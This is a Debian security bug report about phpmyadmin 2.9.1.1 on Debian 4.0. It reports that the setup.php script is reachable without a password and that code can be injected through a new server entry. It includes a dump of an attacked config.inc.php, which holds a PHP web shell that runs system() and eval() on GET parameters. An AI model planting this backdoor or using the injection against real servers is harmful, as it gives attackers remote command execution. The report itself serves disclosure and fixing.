Package: phpmyadmin Version: 4:2.9.1.1-11 Severity: grave Tags: security Justification: user security hole
After install, you can access http://{host}/phpmyadmin/scripts/setup.php without entering any password. By adding a new host in the configuration, an attacker can submit malicius code to execute commands as www-data user. This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack: /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ -- System Information: Debian Release: 4.0 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-6-686 Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti ii perl 5.8.8-7etch6 Larry Wall's Practical Extraction ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5 ii ucf 2.0020 Update Configuration File: preserv Versions of packages phpmyadmin recommends: ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD pn php5-gd | php4-gd <none> (no description available) pn php5-mcrypt | php4-mcrypt <none> (no description available) -- debconf information: phpmyadmin/setup-username: admin phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
